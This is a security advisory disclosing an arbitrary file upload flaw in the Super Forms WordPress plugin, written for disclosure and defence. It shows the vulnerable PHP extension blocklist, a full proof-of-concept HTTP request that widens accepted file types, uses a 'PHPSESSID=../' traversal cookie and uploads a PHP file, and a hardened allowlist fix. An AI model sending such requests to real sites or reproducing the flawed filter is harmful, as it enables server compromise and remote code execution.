usd-2019-0003 | feeling4design Super Forms – Drag & Drop Form Builder/1.6.1 – 4.4.8


Advisory ID: usd-2019-0003
CVE Number: N/A
Affected Product: Super Forms
Affected Version: 1.6.1 – 4.4.8
Vulnerability Type: Missing Server Side File Type Validation
Security Risk: Medium
Vendor URL: https://github.com/feeling4design
Vendor Status: Fixed (Version 4.5.3)
Note: We could still exploit the vulnerability

Description

Due to the lack of validation on the server side, an attacker can add an arbitrary file extension and upload arbitrary files accordingly. This vulnerability, when combined with the vulnerability "Path Traversal in File Upload via PHPSESSID Cookie" described in usd-2019-0002, can lead to Remote Code Execution.

Proof of Concept

The upload of files with an arbitrary extension was tested on a customer's instance of WordPress with Super Forms.

Steps to reproduce:
– Set up WordPress with Super Forms and create a form containing an upload form
– Before submitting this form, add the intended file extension to accept_file_types

The acceptable file types are part of the HTTP request. By default, the value is 'jpg|jpeg|png|gif|pdf|PDF|JPG|JPEG|PNG|GIF', but we were able to add PHP or .* to this field.
The related PHP code in the file uploads/php/index.php:

    if( (!isset($_REQUEST['max_file_size'])) || (!isset($_REQUEST['accept_file_types'])) ) {
        exit;
    }

    error_reporting(E_ALL | E_STRICT);
    require('UploadHandler.php');
    $max_file_size = $_REQUEST['max_file_size'];
    $accept_file_types = $_REQUEST['accept_file_types'];
    $strip = array('php', 'phtml', 'php3', 'php5', 'phps', 'shtml', 'asa', 'cer');

    foreach($strip as $v){
        $accept_file_types = str_replace($v,'', $accept_file_types);
    }

    $upload_handler = new UploadHandler(array(
        'accept_file_types' => '/\.(' . $accept_file_types . ')$/i',
        'max_file_size' => $max_file_size
    ));

To upload the file usd.php we used the following HTTP POST request.
Please note the added "PHP|.*":

POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
Host: XXXXXXXXXXX
[...]
Content-Type: multipart/form-data; boundary=---------------------------100830798400009382880005694
Cookie: [some cookies] PHPSESSID=../
Connection: close
-----------------------------100830798400009382880005694
Content-Disposition: form-data; name="accept_file_types"
jpg|jpeg|png|gif|pdf|PDF|JPG|JPEG|PNG|GIF|TXT|PHP|.*
-----------------------------100830798400009382880005694
Content-Disposition: form-data; name="max_file_size"
8000000
-----------------------------100830798400009382880005694
Content-Disposition: form-data; name="files[]"; filename="usd.php"
Content-Type: text/plain
<?php echo "Dies ist ein Pentest!"; ?>
-----------------------------100830798400009382880005694--

Fix

Disclaimer
The suggested fix is just a temporary workaround and not a final fix that ensures the full security of this WordPress plugin. It is intended to support the developers in closing this vulnerability.

The vulnerabilities we found are not yet fixed by the latest version of this plugin. One option is to turn it off.

Another option is to apply the following temporary fixes:
In /uploads/php/index.php, do not assign $max_file_size and $accept_file_types from user input such as $_REQUEST['accept_file_types'], so that the allowed file extensions are limited to the intended ones. For example, fetch both values from a configuration file instead of from user input.
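
A sketch of the workaround described above, as an added example that is neither the plugin's code nor the vendor's fix: the accepted extensions and size limit are server-side constants, and the original filter is reproduced next to them to show the pattern it builds from the request value in this advisory. The constant names, their values and the helper function names are assumptions.

```php
<?php
// Added example, not the plugin's code. Constant names, values and helper
// names are assumptions; needs PHP 7.0 or later.

// Server-side policy. Nothing here is read from $_REQUEST.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];
const MAX_FILE_SIZE = 8000000; // bytes

// The filter from uploads/php/index.php, reproduced to show the pattern it builds.
function original_pattern(string $acceptFileTypes): string
{
    $strip = array('php', 'phtml', 'php3', 'php5', 'phps', 'shtml', 'asa', 'cer');
    foreach ($strip as $v) {
        // str_replace() is case-sensitive and leaves regex metacharacters alone
        $acceptFileTypes = str_replace($v, '', $acceptFileTypes);
    }
    return '/\.(' . $acceptFileTypes . ')$/i';
}

// Hardened: the pattern is built only from the fixed allowlist.
function allowlist_pattern(): string
{
    $quoted = array_map(function ($ext) {
        return preg_quote($ext, '/');
    }, ALLOWED_EXTENSIONS);
    return '/\.(' . implode('|', $quoted) . ')$/i';
}

function is_allowed_upload(string $filename, int $size): bool
{
    $name = basename($filename); // drop any directory part of the client name
    return $size > 0
        && $size <= MAX_FILE_SIZE
        && preg_match(allowlist_pattern(), $name) === 1;
}

// Constructed input: the accept_file_types value from the request in this advisory.
$fromRequest = 'jpg|jpeg|png|gif|pdf|PDF|JPG|JPEG|PNG|GIF|TXT|PHP|.*';

$checks = [
    'original filter accepts usd.php' => preg_match(original_pattern($fromRequest), 'usd.php') === 1,
    'allowlist accepts usd.php'       => is_allowed_upload('usd.php', 40),
    'allowlist accepts photo.JPG'     => is_allowed_upload('photo.JPG', 1024),
    'allowlist accepts photo.jpg.php' => is_allowed_upload('photo.jpg.php', 1024),
];
foreach ($checks as $label => $result) {
    echo $label, ': ', var_export($result, true), PHP_EOL;
}
```

In index.php, the same two constants would take the place of the $_REQUEST values passed to UploadHandler.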

Timeline

  • 2019-01-25 First Contact request via contact form to: https://codecanyon.net/item/super-forms-drag-drop-form-builder/13979866/support
  • 2019-02-05 Vendor releases version 4.5.3 with a supposed fix. We could still exploit the vulnerability. (related: Changelog on https://codecanyon.net/item/super-forms-drag-drop-form-builder/13979866)
  • 2019-07-31 Security advisory released

Credits

These security vulnerabilities were found by Tim Kranz and Matthias Göhring of usd AG.